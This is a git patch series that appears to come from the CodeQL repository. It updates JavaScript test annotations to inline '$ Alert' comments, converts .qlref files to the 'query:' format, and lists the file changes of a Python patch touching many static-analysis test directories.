@@ -93,22 +93,22 @@ function adHocTestsFor_HeuristicRouteSetups() { } app.get('/some/path', rh); - unknownApp.get('/some/path', rh); + unknownApp.get('/some/path', rh); // $ Alert[js/unpromoted-route-setup-candidate] - unknownApp.get('/some/path', [rh]); + unknownApp.get('/some/path', [rh]); // $ Alert[js/unpromoted-route-setup-candidate] unknownApp.get('/some/path', unknown); unknownApp.get('/some/path', [unknown]); - unknownApp.get('/some/path', unknown, rh); + unknownApp.get('/some/path', unknown, rh); // $ Alert[js/unpromoted-route-setup-candidate] } function adHocTestsFor_HeuristicRouteHandler_withTracking() { function get_rh_dead() { return function rh_dead(req, res) { - } + } // $ Alert[js/unpromoted-route-handler-candidate] } var rh_dead = get_rh_dead(); @@ -134,7 +134,7 @@ function adHocTestsFor_HeuristicRouteHandler_withTracking() { } } var rh_flowToHeuristicSetup = get_rh_flowToHeuristicSetup(); - unknownApp.get('/some/path', rh_flowToHeuristicSetup) + unknownApp.get('/some/path', rh_flowToHeuristicSetup) // $ Alert[js/unpromoted-route-setup-candidate] } function adHocTestsFor_HeuristicRouteSetups_withTracking() { @@ -146,13 +146,13 @@ function adHocTestsFor_HeuristicRouteSetups_withTracking() { var rh = get_rh(); app.get('/some/path', rh); - unknownApp.get('/some/path', rh); + unknownApp.get('/some/path', rh); // $ Alert[js/unpromoted-route-setup-candidate] - unknownApp.get('/some/path', [rh]); + unknownApp.get('/some/path', [rh]); // $ Alert[js/unpromoted-route-setup-candidate] unknownApp.get('/some/path', unknown); unknownApp.get('/some/path', [unknown]); - unknownApp.get('/some/path', unknown, rh); + unknownApp.get('/some/path', unknown, rh); // $ Alert[js/unpromoted-route-setup-candidate] } diff --git a/javascript/ql/test/library-tests/frameworks/Templating/CodeInjection.qlref b/javascript/ql/test/library-tests/frameworks/Templating/CodeInjection.qlref index fe9adbf3b64d..8783ddb3a8a6 100644 
--- a/javascript/ql/test/library-tests/frameworks/Templating/CodeInjection.qlref
+++ b/javascript/ql/test/library-tests/frameworks/Templating/CodeInjection.qlref
@@ -1 +1 @@
-Security/CWE-094/CodeInjection.ql
+query: Security/CWE-094/CodeInjection.ql
diff --git a/javascript/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref b/javascript/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref
index 9d7833eccae7..dc898fca718c 100644
--- a/javascript/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref
+++ b/javascript/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref
@@ -1 +1 @@
-AlertSuppression.ql
+query: AlertSuppression.ql
diff --git a/javascript/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref b/javascript/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref
index 2fe8364c4ea7..58bc903a431d 100644
--- a/javascript/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref
+++ b/javascript/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref
@@ -1 +1 @@
-Diagnostics/ExtractedFiles.ql
\ No newline at end of file
+query: Diagnostics/ExtractedFiles.ql
diff --git a/javascript/ql/test/query-tests/Diagnostics/ExtractionErrors.qlref b/javascript/ql/test/query-tests/Diagnostics/ExtractionErrors.qlref
index 5e501b2469d2..20403d282f0a 100644
--- a/javascript/ql/test/query-tests/Diagnostics/ExtractionErrors.qlref
+++ b/javascript/ql/test/query-tests/Diagnostics/ExtractionErrors.qlref
@@ -1 +1 @@
-Diagnostics/ExtractionErrors.ql
\ No newline at end of file
+query: Diagnostics/ExtractionErrors.ql
diff --git a/javascript/ql/test/query-tests/Metrics/ExternalDependencies/ExternalDependencies.qlref b/javascript/ql/test/query-tests/Metrics/ExternalDependencies/ExternalDependencies.qlref
index aa190bb0a9a9..8b37766f8302 100644
--- a/javascript/ql/test/query-tests/Metrics/ExternalDependencies/ExternalDependencies.qlref
+++ b/javascript/ql/test/query-tests/Metrics/ExternalDependencies/ExternalDependencies.qlref
@@ -1 +1 @@
-Metrics/Dependencies/ExternalDependencies.ql
\ No newline at end of file
+query: Metrics/Dependencies/ExternalDependencies.ql
diff --git a/javascript/ql/test/query-tests/Metrics/FLinesOfCode/FLinesOfCode.qlref b/javascript/ql/test/query-tests/Metrics/FLinesOfCode/FLinesOfCode.qlref
index f1524eec4972..6a2c24b94b1d 100644
--- a/javascript/ql/test/query-tests/Metrics/FLinesOfCode/FLinesOfCode.qlref
+++ b/javascript/ql/test/query-tests/Metrics/FLinesOfCode/FLinesOfCode.qlref
@@ -1 +1 @@
-Metrics/FLinesOfCode.ql
\ No newline at end of file
+query: Metrics/FLinesOfCode.ql
diff --git a/javascript/ql/test/query-tests/Summary/LinesOfCode.qlref b/javascript/ql/test/query-tests/Summary/LinesOfCode.qlref
index ac8650d6dcc4..d22b10044239 100644
--- a/javascript/ql/test/query-tests/Summary/LinesOfCode.qlref
+++ b/javascript/ql/test/query-tests/Summary/LinesOfCode.qlref
@@ -1 +1 @@
-Summary/LinesOfCode.ql
\ No newline at end of file
+query: Summary/LinesOfCode.ql
diff --git a/javascript/ql/test/query-tests/Summary/LinesOfUserCode.qlref b/javascript/ql/test/query-tests/Summary/LinesOfUserCode.qlref
index 548874fe786a..99a6d1324943 100644
--- a/javascript/ql/test/query-tests/Summary/LinesOfUserCode.qlref
+++ b/javascript/ql/test/query-tests/Summary/LinesOfUserCode.qlref
@@ -1 +1 @@
-Summary/LinesOfUserCode.ql
\ No newline at end of file
+query: Summary/LinesOfUserCode.ql
diff --git a/javascript/ql/test/query-tests/definitions/definitions.qlref b/javascript/ql/test/query-tests/definitions/definitions.qlref
index 7b600c094b54..89fab02d1037 100644
--- a/javascript/ql/test/query-tests/definitions/definitions.qlref
+++ b/javascript/ql/test/query-tests/definitions/definitions.qlref
@@ -1 +1 @@
-definitions.ql
+query: definitions.ql
diff --git a/javascript/ql/test/query-tests/filters/ClassifyFiles/ClassifyFiles.qlref b/javascript/ql/test/query-tests/filters/ClassifyFiles/ClassifyFiles.qlref
index 638bf4567627..612f5dfb3322 100644
--- a/javascript/ql/test/query-tests/filters/ClassifyFiles/ClassifyFiles.qlref
+++ b/javascript/ql/test/query-tests/filters/ClassifyFiles/ClassifyFiles.qlref
@@ -1 +1 @@
-filters/ClassifyFiles.ql
\ No newline at end of file
+query: filters/ClassifyFiles.ql
From 8e0769004975d9dc3bfe34b6c7db64702e535fc1 Mon Sep 17 00:00:00 2001
From: Owen Mansel-Chan Date: Wed, 10 Jun 2026 22:57:42 +0200 Subject: [PATCH 05/15] Python --- .../inconsistent-mro/InconsistentMRO.qlref | 3 +- .../inconsistent-mro/inconsistent_mro.py | 2 +- .../new-style/PropertyInOldStyleClass.qlref | 3 +- .../new-style/SlotsInOldStyleClass.qlref | 3 +- .../new-style/SuperInOldStyleClass.qlref | 3 +- .../Classes/new-style/newstyle_test.py | 4 +- .../Classes/new-style/property_old_style.py | 2 +- .../MaybeUndefinedClassAttribute.qlref | 3 +- .../UndefinedClassAttribute.qlref | 3 +- .../general/CatchingBaseException.qlref | 3 +- .../Exceptions/general/EmptyExcept.qlref | 3 +- .../general/IllegalExceptionHandlerType.qlref | 3 +- .../Exceptions/general/IllegalRaise.qlref | 3 +- .../general/IncorrectExceptOrder.qlref | 3 +- .../Exceptions/general/exceptions_test.py | 2 +- .../generators/UnguardedNextInGenerator.qlref | 3 +- .../query-tests/Exceptions/generators/test.py | 4 +- .../Exceptions/raising/RaisingTuple.qlref | 3 +- .../2/query-tests/Exceptions/raising/test.py | 6 +- .../Expressions/TruncatedDivision.qlref | 3 +- .../Expressions/TruncatedDivision_test.py | 4 +- .../2/query-tests/Expressions/UseofApply.py | 2 +- .../query-tests/Expressions/UseofApply.qlref | 3 +- .../query-tests/Expressions/UseofInput.qlref | 3 +- .../Expressions/expressions_test.py | 4 +- .../Functions/DeprecatedSliceMethod.qlref | 3 +- .../encoding_error/EncodingError.qlref | 3 +- .../Imports/syntax_error/EncodingError.qlref | 3 +- .../Imports/syntax_error/SyntaxError.qlref | 3 +- .../Imports/syntax_error/bad_encoding.py | 2 +- .../Imports/syntax_error/nonsense.py | 2 +- .../query-tests/Lexical/OldOctalLiteral.qlref | 3 +- .../2/query-tests/Lexical/lexical_test.py | 2 +- .../2/query-tests/Statements/ExecUsed.qlref | 3 +- .../Statements/IterableStringOrSequence.qlref | 3 +- .../Statements/TopLevelPrint.qlref | 3 +- .../test/2/query-tests/Statements/module.py | 2 +- .../query-tests/Statements/statements_test.py | 4 +- 
.../2/query-tests/Summary/LinesOfCode.qlref | 2 +- .../query-tests/Summary/LinesOfUserCode.qlref | 2 +- .../Variables/LeakyComp/LeakyComp.qlref | 3 +- .../2/query-tests/Variables/LeakyComp/test.py | 4 +- .../Variables/undefined/UndefinedExport.py | 2 +- .../Variables/undefined/UndefinedExport.qlref | 3 +- .../Variables/undefined/UndefinedGlobal.qlref | 3 +- .../undefined/UninitializedLocal.qlref | 3 +- .../Variables/undefined/package/__init__.py | 2 +- .../DefineEqualsWhenAddingAttributes.qlref | 3 +- .../3/query-tests/Classes/equals-attr/test.py | 2 +- .../inconsistent-mro/InconsistentMRO.qlref | 3 +- .../inconsistent-mro/inconsistent_mro.py | 4 +- .../MaybeUndefinedClassAttribute.qlref | 3 +- .../UndefinedClassAttribute.qlref | 3 +- .../WrongNameForArgumentInCall.qlref | 3 +- .../WrongNumberArgumentsInCall.qlref | 3 +- .../Expressions/Arguments/wrong_arguments.py | 6 +- .../WrongNumberArgumentsForFormat.qlref | 3 +- .../TruncatedDivision/TruncatedDivision.qlref | 3 +- .../Expressions/UseofApply/UseofApply.qlref | 3 +- .../encoding_error/EncodingError.qlref | 3 +- .../Imports/syntax_error/EncodingError.qlref | 3 +- .../Imports/syntax_error/SyntaxError.qlref | 3 +- .../Imports/syntax_error/bad_encoding.py | 2 +- .../Imports/syntax_error/nonsense.py | 2 +- .../Statements/general/ExecUsed.qlref | 3 +- .../Statements/general/TopLevelPrint.qlref | 3 +- .../query-tests/Statements/general/module.py | 2 +- .../Statements/general/statements_test.py | 2 +- .../iter/IterableStringOrSequence.qlref | 3 +- .../iter/NonIteratorInForLoop.qlref | 3 +- .../Statements/iter/async_iterator.py | 2 +- .../Statements/iter/statements_test.py | 4 +- .../unreachable/UnreachableCode.qlref | 3 +- .../UnreachableCode.qlref | 3 +- .../3/query-tests/Summary/LinesOfCode.qlref | 2 +- .../query-tests/Summary/LinesOfUserCode.qlref | 2 +- .../Variables/undefined/UndefinedExport.py | 2 +- .../Variables/undefined/UndefinedExport.qlref | 3 +- .../undefined/UninitializedLocal.qlref | 3 +- 
.../Variables/undefined/enum_convert.py | 2 +- .../Variables/undefined/package/__init__.py | 2 +- .../InlineCallGraphTest.qlref | 2 +- .../InlineCallGraphTest.qlref | 2 +- .../InlineCallGraphTest.qlref | 2 +- .../library-tests/FindSubclass/Find.qlref | 2 +- .../Naming/NamingConventionsClasses.py | 2 +- .../Naming/NamingConventionsClasses.qlref | 3 +- .../general/NamingConventionsFunctions.py | 2 +- .../general/NamingConventionsFunctions.qlref | 3 +- .../Security/CWE-022-TarSlip/TarSlip.expected | 60 +++--- .../Security/CWE-022-TarSlip/TarSlip.qlref | 3 +- .../Security/CWE-022-TarSlip/TarSlipImprov.py | 110 +++++------ .../Security/CWE-022-TarSlip/ZipSlip.expected | 12 +- .../Security/CWE-022-TarSlip/ZipSlip.qlref | 3 +- .../Security/CWE-022-TarSlip/zipslip_bad.py | 20 +- .../RemoteCommandExecution.qlref | 2 +- .../Security/CWE-079/EmailXss.expected | 30 +-- .../Security/CWE-079/EmailXss.qlref | 3 +- .../Security/CWE-079/django_mail.py | 6 +- .../Security/CWE-079/flask_mail.py | 8 +- .../Security/CWE-079/sendgrid_mail.py | 8 +- ...rid_via_mail_send_post_request_body_bad.py | 8 +- .../Security/CWE-079/smtplib_bad_subparts.py | 4 +- .../CWE-079/smtplib_bad_via_attach.py | 4 +- .../XsltInjection.expected | 14 +- .../CWE-091-XsltInjection/XsltInjection.qlref | 3 +- .../Security/CWE-091-XsltInjection/xslt.py | 4 +- .../CWE-091-XsltInjection/xsltInjection.py | 12 +- .../Security/CWE-094/Js2Py.expected | 4 +- .../query-tests/Security/CWE-094/Js2Py.qlref | 3 +- .../query-tests/Security/CWE-094/Js2PyTest.py | 4 +- .../Security/CWE-1236/CsvInjection.expected | 8 +- .../Security/CWE-1236/CsvInjection.qlref | 3 +- .../query-tests/Security/CWE-1236/csv_bad.py | 8 +- .../CWE-176/UnicodeBypassValidation.qlref | 2 +- .../PossibleTimingAttackAgainstHash.expected | 6 +- .../PossibleTimingAttackAgainstHash.qlref | 3 +- .../TimingAttackAgainstHash.expected | 2 +- .../TimingAttackAgainstHash.py | 8 +- .../TimingAttackAgainstHash.qlref | 3 +- .../TimingAttackAgainstHeader.py | 2 +- 
.../TimingAttackAgainstHeaderValue.expected | 4 +- .../TimingAttackAgainstHeaderValue.qlref | 3 +- ...eTimingAttackAgainstSensitiveInfo.expected | 6 +- ...ibleTimingAttackAgainstSensitiveInfo.qlref | 3 +- .../TimingAttackAgainstSensitiveInfo.py | 4 +- .../ConstantSecretKey.expected | 20 +- .../ConstantSecretKey.qlref | 3 +- .../CWE-287-ConstantSecretKey/app_safe.py | 2 +- .../CWE-287-ConstantSecretKey/app_unsafe.py | 10 +- .../CWE-287-ConstantSecretKey/config.py | 8 +- .../CWE-287-ConstantSecretKey/config2.py | 2 +- .../Security/CWE-287/ImproperLdapAuth.qlref | 3 +- .../Security/CWE-287/auth_bad_2.py | 12 +- .../Security/CWE-287/auth_bad_3.py | 8 +- ...sageOfClientSideEncryptionVersion.expected | 12 +- ...feUsageOfClientSideEncryptionVersion.qlref | 3 +- .../test.py | 16 +- .../CWE-338/InsecureRandomness.expected | 4 +- .../Security/CWE-338/InsecureRandomness.py | 2 +- .../Security/CWE-338/InsecureRandomness.qlref | 3 +- .../query-tests/Security/CWE-346/Cors.py | 4 +- .../Security/CWE-346/CorsBypass.expected | 4 +- .../Security/CWE-346/CorsBypass.qlref | 3 +- .../CWE-347/JWTEmptyKeyOrAlgorithm.qlref | 3 +- ...MissingSecretOrPublicKeyVerification.qlref | 3 +- .../query-tests/Security/CWE-347/authlib.py | 4 +- .../query-tests/Security/CWE-347/pyjwt.py | 10 +- .../Security/CWE-347/python_jose.py | 6 +- .../Security/CWE-347/python_jwt.py | 2 +- ...ientSuppliedIpUsedInSecurityCheck.expected | 8 +- .../ClientSuppliedIpUsedInSecurityCheck.qlref | 3 +- .../query-tests/Security/CWE-348/flask_bad.py | 8 +- .../Security/CWE-348/tornado_bad.py | 4 +- .../LdapInsecureAuth.expected | 2 +- .../LdapInsecureAuth.qlref | 3 +- .../CWE-522/LdapInsecureAuth.expected | 14 +- .../Security/CWE-522/LdapInsecureAuth.qlref | 3 +- .../Security/CWE-522/ldap2_remote.py | 4 +- .../Security/CWE-522/ldap3_remote.py | 16 +- .../SimpleXmlRpcServer.qlref | 3 +- .../xmlrpc_server.py | 2 +- .../Security/CWE-770/UnicodeDoS.expected | 14 +- .../Security/CWE-770/UnicodeDoS.qlref | 3 +- 
.../query-tests/Security/CWE-770/tests.py | 14 +- .../overlay/basic-overlay-eval/test.qlref | 2 +- .../coverage-py2/argumentRoutingTest.qlref | 2 +- .../coverage-py3/argumentRoutingTest.qlref | 2 +- .../typetracking_imports/tracked.qlref | 2 +- .../frameworks/django-orm/ReflectedXss.qlref | 2 +- .../frameworks/gradio/taint_step_test.qlref | 2 +- .../modelling/FrameworkModeEndpoints.qlref | 2 +- ...gNameForArgumentInClassInstantiation.qlref | 3 +- ...gNumberArgumentsInClassInstantiation.qlref | 3 +- .../Classes/Arguments/wrong_arguments.py | 38 ++-- .../ConflictingAttributesInBaseClasses.qlref | 3 +- .../query-tests/Classes/conflicting/test.py | 2 +- .../descriptors/MutatingDescriptor.qlref | 3 +- .../query-tests/Classes/descriptors/test.py | 4 +- .../DefineEqualsWhenAddingAttributes.qlref | 3 +- .../Classes/equals-attr/attr_eq_test.py | 2 +- .../InitCallsSubclassMethod.qlref | 3 +- .../init_calls_subclass.py | 4 +- .../OverwritingAttributeInSuperClass.qlref | 3 +- .../overwriting_attribute.py | 4 +- .../ShouldBeContextManager.qlref | 3 +- .../should_be_context_manager.py | 4 +- .../MaybeUndefinedClassAttribute.qlref | 3 +- .../UndefinedClassAttribute.qlref | 3 +- .../undefined_attribute.py | 16 +- .../Classes/useless/UselessClass.qlref | 3 +- .../test/query-tests/Classes/useless/test.py | 4 +- .../Diagnostics/ExtractedFiles.qlref | 2 +- .../Diagnostics/ExtractionWarnings.qlref | 2 +- .../general/CatchingBaseException.qlref | 2 +- .../Exceptions/general/EmptyExcept.qlref | 2 +- .../general/IllegalExceptionHandlerType.qlref | 2 +- .../Exceptions/general/IllegalRaise.qlref | 2 +- .../NotImplementedIsNotAnException.qlref | 2 +- .../WrongNameForArgumentInCall.qlref | 3 +- .../WrongNumberArgumentsInCall.qlref | 3 +- .../Expressions/Arguments/use_mox.py | 8 +- .../Expressions/Arguments/wrong_arguments.py | 50 ++--- .../MixedExplicitImplicitIn3101Format.qlref | 3 +- .../UnusedArgumentIn3101Format.qlref | 3 +- .../UnusedNamedArgumentIn3101Format.qlref | 3 +- 
.../WrongNameInArgumentsFor3101Format.qlref | 3 +- .../WrongNumberArgumentsFor3101Format.qlref | 3 +- .../Expressions/Formatting/test.py | 32 ++-- .../Formatting/unknown_format_string.py | 6 +- .../Expressions/Regex/BackspaceEscape.qlref | 3 +- .../Regex/DuplicateCharacterInSet.qlref | 3 +- .../Regex/MissingPartSpecialGroup.qlref | 3 +- .../Expressions/Regex/UnmatchableCaret.qlref | 3 +- .../Expressions/Regex/UnmatchableDollar.qlref | 3 +- .../query-tests/Expressions/Regex/test.py | 32 ++-- .../callable/NonCallableCalled.qlref | 3 +- .../query-tests/Expressions/callable/test.py | 12 +- .../comparisons/UselessComparisonTest.qlref | 3 +- .../Expressions/comparisons/test.py | 20 +- .../eq/IncorrectComparisonUsingIs.qlref | 3 +- .../eq/NonPortableComparisonUsingIs.qlref | 3 +- .../Expressions/eq/expressions_test.py | 4 +- .../general/CompareConstants.qlref | 3 +- .../general/CompareIdenticalValues.qlref | 3 +- .../CompareIdenticalValuesMissingSelf.qlref | 3 +- .../general/ContainsNonContainer.qlref | 3 +- .../DuplicateKeyInDictionaryLiteral.qlref | 3 +- .../Expressions/general/EqualsNone.qlref | 3 +- .../ExpectedMappingForFormatString.qlref | 3 +- .../general/ExplicitCallToDel.qlref | 3 +- .../Expressions/general/HashedButNoHash.qlref | 3 +- .../general/UnnecessaryLambda.qlref | 3 +- .../general/UnsupportedFormatCharacter.qlref | 3 +- .../WrongNumberArgumentsForFormat.qlref | 3 +- .../Expressions/general/compare.py | 10 +- .../Expressions/general/expressions_test.py | 28 +-- .../Expressions/general/str_fmt_test.py | 8 +- ...tentionalImplicitStringConcatenation.qlref | 3 +- .../query-tests/Expressions/strings/test.py | 8 +- .../super/CallToSuperWrongClass.qlref | 3 +- .../query-tests/Expressions/super/test.py | 2 +- .../ModificationOfParameterWithDefault.qlref | 2 +- .../general/DeprecatedSliceMethod.qlref | 3 +- .../general/ExplicitReturnInInit.qlref | 3 +- .../Functions/general/InitIsGenerator.qlref | 3 +- .../general/IterReturnsNonIterator.qlref | 2 +- 
.../general/OverlyComplexDelMethod.qlref | 3 +- .../general/SignatureOverriddenMethod.qlref | 3 +- .../general/SignatureSpecialMethods.qlref | 3 +- .../general/explicit_return_in_init.py | 6 +- .../Functions/general/functions_test.py | 6 +- .../query-tests/Functions/general/om_test.py | 16 +- .../Functions/general/protocols.py | 2 +- .../iterators/IterReturnsNonSelf.qlref | 3 +- .../query-tests/Functions/iterators/test.py | 4 +- .../IncorrectlyOverriddenMethod.qlref | 2 +- ...IncorrectlySpecifiedOverriddenMethod.qlref | 2 +- .../WrongNameForArgumentInCall.qlref | 2 +- .../WrongNumberArgumentsInCall.qlref | 2 +- .../return_values/ConsistentReturns.qlref | 3 +- .../ReturnConsistentTupleSizes.qlref | 3 +- .../return_values/ReturnValueIgnored.qlref | 3 +- .../UseImplicitNoneReturnValue.qlref | 3 +- .../Functions/return_values/functions_test.py | 20 +- .../PyCheckerTests/ImportandImportFrom.qlref | 3 +- .../PyCheckerTests/ModuleImportsItself.qlref | 3 +- .../Imports/PyCheckerTests/imports_test.py | 4 +- .../PyCheckerTests/pkg_notok/__init__.py | 8 +- .../ModuleLevelCyclicImport.qlref | 3 +- .../cyclic-module-annotations-fp/module3.py | 2 +- .../cyclic-module-annotations-fp/module4.py | 2 +- .../false-negative/CyclicImport.qlref | 3 +- .../ModuleLevelCyclicImport.qlref | 3 +- .../true-negative/CyclicImport.qlref | 3 +- .../ModuleLevelCyclicImport.qlref | 3 +- .../Imports/cyclic-module/CyclicImport.qlref | 3 +- .../ModuleLevelCyclicImport.qlref | 3 +- .../Imports/cyclic-module/module1.py | 12 +- .../Imports/cyclic-module/module2.py | 2 +- .../Imports/cyclic-module/module3.py | 2 +- .../Imports/cyclic-module/module4.py | 2 +- .../Imports/cyclic-module/module5.py | 2 +- .../Imports/cyclic-module/module6.py | 2 +- .../Imports/cyclic-module/module7.py | 2 +- .../Imports/cyclic-module/module8.py | 2 +- .../Imports/cyclic-module/module9.py | 2 +- .../Imports/deprecated/DeprecatedModule.qlref | 3 +- .../query-tests/Imports/deprecated/test.py | 6 +- 
.../FromImportOfMutableAttribute.qlref | 3 +- .../general/ImportShadowedByLoopVar.qlref | 3 +- .../Imports/general/ImportStarUsed.qlref | 3 +- .../query-tests/Imports/general/Imports.qlref | 3 +- .../Imports/general/MultipleImport.qlref | 3 +- .../Imports/general/UnintentionalImport.qlref | 3 +- .../Imports/general/imports_mutable.py | 2 +- .../Imports/general/imports_test.py | 14 +- .../Imports/unused/UnusedImport.qlref | 3 +- .../Imports/unused/import_structure_1.py | 2 +- .../Imports/unused/import_structure_2.py | 2 +- .../Imports/unused/imports_test.py | 12 +- .../Lexical/ToDoComment/ToDoComment.qlref | 3 +- .../query-tests/Lexical/ToDoComment/todo.py | 2 +- .../commented_out_code/CommentedOutCode.qlref | 3 +- .../FCommentedOutCode.qlref | 2 +- .../Lexical/commented_out_code/test.py | 6 +- .../Metrics/cyclo/CyclomaticComplexity.qlref | 2 +- .../FunctionStatementNestingDepth.qlref | 2 +- .../Metrics/imports/DirectImports.qlref | 2 +- .../Metrics/imports/TransitiveImports.qlref | 2 +- .../Metrics/lines/CommentRatio.qlref | 2 +- .../Metrics/lines/FLinesOfCode.qlref | 2 +- .../Metrics/ratios/CommentRatio.qlref | 2 +- .../Metrics/ratios/DocStringRatio.qlref | 2 +- .../Metrics/tests/FNumberOfTests.qlref | 2 +- .../CookieInjection.expected | 8 +- .../CookieInjection.qlref | 3 +- .../CWE-020-CookieInjection/django_tests.py | 10 +- .../ExternalAPIsUsedWithUntrustedData.qlref | 2 +- .../UntrustedDataToExternalAPI.expected | 14 +- .../UntrustedDataToExternalAPI.qlref | 3 +- .../Security/CWE-020-ExternalAPIs/test.py | 14 +- .../IncompleteHostnameRegExp.qlref | 3 +- .../hosttest.py | 2 +- .../IncompleteUrlSubstringSanitization.qlref | 3 +- .../urltest.py | 4 +- .../OverlyLargeRangeQuery.qlref | 3 +- .../CWE-020-SuspiciousRegexpRange/test.py | 22 +-- .../Security/CWE-022-TarSlip/TarSlip.expected | 20 +- .../Security/CWE-022-TarSlip/TarSlip.qlref | 3 +- .../Security/CWE-022-TarSlip/tarslip.py | 36 ++-- .../CWE-074-TemplateInjection/JinjaSsti.py | 8 +- 
.../TemplateInjection.expected | 6 +- .../TemplateInjection.qlref | 3 +- .../CommandInjection.expected | 20 +- .../CommandInjection.qlref | 3 +- .../command_injection.py | 20 +- .../CommandInjection.qlref | 2 +- .../UnsafeShellCommandConstruction.qlref | 2 +- .../Jinja2WithoutEscaping.qlref | 3 +- .../jinja2_escaping.py | 12 +- .../ReflectedXss.expected | 8 +- .../CWE-079-ReflectedXss/ReflectedXss.qlref | 3 +- .../CWE-079-ReflectedXss/reflected_xss.py | 8 +- .../SqlInjection.expected | 34 ++-- .../CWE-089-SqlInjection/SqlInjection.qlref | 3 +- .../CWE-089-SqlInjection/sql_injection.py | 10 +- .../sqlalchemy_textclause.py | 28 +-- .../LdapInjection.expected | 22 +-- .../CWE-090-LdapInjection/LdapInjection.qlref | 3 +- .../CWE-090-LdapInjection/ldap3_bad.py | 6 +- .../CWE-090-LdapInjection/ldap_bad.py | 8 +- .../HeaderInjection.expected | 2 +- .../HeaderInjection.qlref | 3 +- .../CWE-116-BadTagFilter/BadTagFilter.qlref | 3 +- .../Security/CWE-116-BadTagFilter/tst.py | 34 ++-- .../LogInjection.expected | 10 +- .../CWE-117-LogInjection/LogInjection.qlref | 3 +- .../CWE-117-LogInjection/LogInjectionBad.py | 10 +- .../StackTraceExposure.qlref | 2 +- .../CWE-215-FlaskDebug/FlaskDebug.qlref | 3 +- .../Security/CWE-215-FlaskDebug/test.py | 12 +- .../PamAuthorization.expected | 4 +- .../PamAuthorization.qlref | 3 +- .../CWE-285-PamAuthorization/pam_test.py | 4 +- .../MissingHostKeyValidation.qlref | 3 +- .../paramiko_host_key.py | 10 +- .../RequestWithoutValidation.qlref | 3 +- .../make_request.py | 12 +- .../CleartextLogging.expected | 50 ++--- .../CleartextLogging.qlref | 3 +- .../Security/CWE-312-CleartextLogging/test.py | 62 +++--- .../CleartextStorage.expected | 8 +- .../CleartextStorage.qlref | 3 +- .../CWE-312-CleartextStorage-py3/test.py | 8 +- .../CleartextStorage.expected | 10 +- .../CleartextStorage.qlref | 3 +- .../password_in_cookie.py | 8 +- .../Security/CWE-312-CleartextStorage/test.py | 6 +- .../CWE-326-WeakCryptoKey/WeakCryptoKey.qlref | 3 +- 
.../CWE-326-WeakCryptoKey/weak_crypto.py | 18 +- .../BrokenCryptoAlgorithm.qlref | 3 +- .../test_cryptodome.py | 4 +- .../test_cryptography.py | 4 +- .../InsecureDefaultProtocol.qlref | 3 +- .../InsecureProtocol.py | 2 +- .../InsecureProtocol.py | 24 +-- .../InsecureProtocol.qlref | 3 +- .../import_all_one_file.py | 4 +- .../CWE-327-InsecureProtocol/import_use.py | 4 +- .../pyOpenSSL_fluent.py | 4 +- .../CWE-327-InsecureProtocol/ssl_fluent.py | 20 +- .../WeakSensitiveDataHashing.expected | 26 +-- .../WeakSensitiveDataHashing.qlref | 3 +- .../test_cryptodome.py | 14 +- .../test_cryptography.py | 14 +- .../InsecureTemporaryFile.py | 6 +- .../InsecureTemporaryFile.qlref | 3 +- .../UnsafeDeserialization.expected | 12 +- .../UnsafeDeserialization.qlref | 3 +- .../unsafe_deserialization.py | 12 +- .../CWE-601-UrlRedirect/UrlRedirect.expected | 26 +-- .../CWE-601-UrlRedirect/UrlRedirect.qlref | 4 +- .../Security/CWE-601-UrlRedirect/test.py | 26 +-- .../Security/CWE-611-Xxe/Xxe.expected | 6 +- .../Security/CWE-611-Xxe/Xxe.qlref | 3 +- .../query-tests/Security/CWE-611-Xxe/test.py | 6 +- .../XpathInjection.expected | 14 +- .../XpathInjection.qlref | 3 +- .../CWE-643-XPathInjection/xpathBad.py | 4 +- .../CWE-643-XPathInjection/xpathFlow.py | 12 +- .../PolynomialReDoS.expected | 12 +- .../PolynomialReDoS.qlref | 3 +- .../Security/CWE-730-PolynomialReDoS/test.py | 12 +- .../Security/CWE-730-ReDoS/KnownCVEs.py | 6 +- .../Security/CWE-730-ReDoS/ReDoS.qlref | 3 +- .../Security/CWE-730-ReDoS/redos.py | 180 +++++++++--------- .../Security/CWE-730-ReDoS/unittests.py | 10 +- .../RegexInjection.expected | 8 +- .../RegexInjection.qlref | 3 +- .../Security/CWE-730-RegexInjection/re_bad.py | 8 +- .../WeakFilePermissions.qlref | 3 +- .../CWE-732-WeakFilePermissions/test.py | 12 +- .../Security/CWE-776-XmlBomb/XmlBomb.expected | 2 +- .../Security/CWE-776-XmlBomb/XmlBomb.qlref | 3 +- .../HardcodedCredentials.expected | 6 +- .../HardcodedCredentials.qlref | 3 +- 
.../CWE-798-HardcodedCredentials/test.py | 8 +- .../CorsMisconfigurationMiddleware.qlref | 3 +- .../fastapi.py | 2 +- .../starlette.py | 2 +- .../NoSqlInjection.qlref | 2 +- .../Statements/DocStrings/DocStrings.qlref | 2 +- .../ReturnOrYieldOutsideFunction.qlref | 3 +- .../ReturnOrYieldOutsideFunction_test.py | 18 +- .../asserts/AssertLiteralConstant.qlref | 3 +- .../Statements/asserts/AssertOnTuple.qlref | 3 +- .../asserts/SideEffectInAssert.qlref | 3 +- .../query-tests/Statements/asserts/assert.py | 28 +-- .../Statements/asserts/side_effect.py | 2 +- .../Statements/exit/UseOfExit.qlref | 3 +- .../test/query-tests/Statements/exit/test.py | 2 +- .../general/BreakOrReturnInFinally.qlref | 3 +- .../general/C_StyleParentheses.qlref | 3 +- .../general/ConstantInConditional.qlref | 3 +- .../MismatchInMultipleAssignment.qlref | 3 +- .../general/ModificationOfLocals.qlref | 3 +- .../general/NestedLoopsSameVariable.qlref | 3 +- .../NestedLoopsSameVariableWithReuse.qlref | 3 +- .../general/NonIteratorInForLoop.qlref | 3 +- .../general/RedundantAssignment.qlref | 3 +- .../general/ShouldUseWithStatement.qlref | 3 +- .../general/StringConcatenationInLoop.qlref | 3 +- .../general/UnnecessaryDelete.qlref | 3 +- .../general/UnnecessaryElseClause.qlref | 3 +- .../Statements/general/UnnecessaryPass.qlref | 3 +- .../query-tests/Statements/general/nested.py | 12 +- .../Statements/general/performance.py | 4 +- .../Statements/general/statements_test.py | 22 +-- .../query-tests/Statements/general/test.py | 30 +-- .../no_effect/StatementNoEffect.qlref | 3 +- .../no_effect/UnusedExceptionObject.qlref | 